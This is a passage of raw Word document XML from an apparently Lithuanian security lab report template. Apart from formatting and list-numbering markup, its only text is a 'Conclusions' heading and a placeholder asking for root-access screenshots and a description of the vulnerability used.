            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="436175F1" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C77FC09" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320CBFEF" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C056C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IŠVADOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17889B4F" w14:textId="77777777" w:rsidR="006F17EE" w:rsidRPr="00607DC0" w:rsidRDefault="006F17EE" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="769"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC9C194" w14:textId="77777777" w:rsidR="00157A71" w:rsidRPr="00607DC0" w:rsidRDefault="00157A71" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(įkelti darbalaukio nuotraukas su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> teisėmis ir aprašyti pažeidžiamumą, kaip jos buvo gautos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBAE72F" w14:textId="77777777" w:rsidR="006F17EE" w:rsidRPr="00607DC0" w:rsidRDefault="006F17EE" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="769"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1343ECD7" w14:textId="77777777" w:rsidR="006F17EE" w:rsidRPr="00607DC0" w:rsidRDefault="006F17EE" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="769"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE1A3D6" w14:textId="77777777" w:rsidR="006F17EE" w:rsidRPr="00607DC0" w:rsidRDefault="006F17EE" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="769"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C36DA75" w14:textId="77777777" w:rsidR="00C87CD1" w:rsidRPr="00607DC0" w:rsidRDefault="00C87CD1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCD937F" w14:textId="77777777" w:rsidR="00883399" w:rsidRPr="00607DC0" w:rsidRDefault="00883399" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46226DEC" w14:textId="16A2509A" w:rsidR="00CA78BB" w:rsidRPr="00607DC0" w:rsidRDefault="00CA78BB" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CA78BB" w:rsidRPr="00607DC0" w:rsidSect="005757BE">
      <w:footerReference w:type="even" r:id="rId29"/>
      <w:footerReference w:type="default" r:id="rId30"/>
      <w:pgSz w:w="11900" w:h="16840"/>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2EEA" w14:textId="77777777" w:rsidR="0027638B" w:rsidRDefault="0027638B" w:rsidP="009A677B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="564EF2D3" w14:textId="77777777" w:rsidR="0027638B" w:rsidRDefault="0027638B" w:rsidP="009A67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alibri">
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:val="BA"/>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altName w:val="﷽﷽﷽﷽﷽﷽﷽﷽rande"/>
    <w:panose1 w:val="020B0600040502020204"/>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84D36E" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009B7A36" w:rsidP="00BC5548">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right" w:y="1"/>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="009A677B">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="02AFD983" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009A677B" w:rsidP="009A677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0B9BD5" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009B7A36" w:rsidP="00BC5548">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right" w:y="1"/>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="009A677B">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00C60AE6">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="4A65E93F" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009A677B" w:rsidP="009A677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AC1924" w14:textId="77777777" w:rsidR="0027638B" w:rsidRDefault="0027638B" w:rsidP="009A677B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="102A712B" w14:textId="77777777" w:rsidR="0027638B" w:rsidRDefault="0027638B" w:rsidP="009A67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6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000006"/>
    <w:name w:val="WW8Num6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="094E25CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E7E71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C97A5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EDA09A6"/>
    <w:lvl w:ilvl="0" w:tplc="A1F834B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DD140A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3286B186"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17903160"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4F812A4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="644" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="108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800" w:hanging="144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2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="22164E15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BA0BFCC"/>
    <w:lvl w:ilvl="0" w:tplc="04270001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="644" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1364" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2084" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0427000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2804" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3524" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4244" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0427000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4964" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5684" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6404" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="28AF6A80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81D66F06"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>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CB0131A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB0690C4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="MAG-3"/>
      <w:isLgl/>
      <w:lvlText w:val="6.%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380D7746"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D69CB846"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="MAG-2"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="216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960" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="108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840" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8640" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40C17BF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E36EE74"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04270001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04270001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="50267F3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D0898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5B203177"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC3E72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D717869"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26D4E60A"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1364" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2084" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2804" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04270001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3524" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4244" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4964" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04270001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5684" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6404" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7124" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="620C2A87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84787D28"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="180"/>
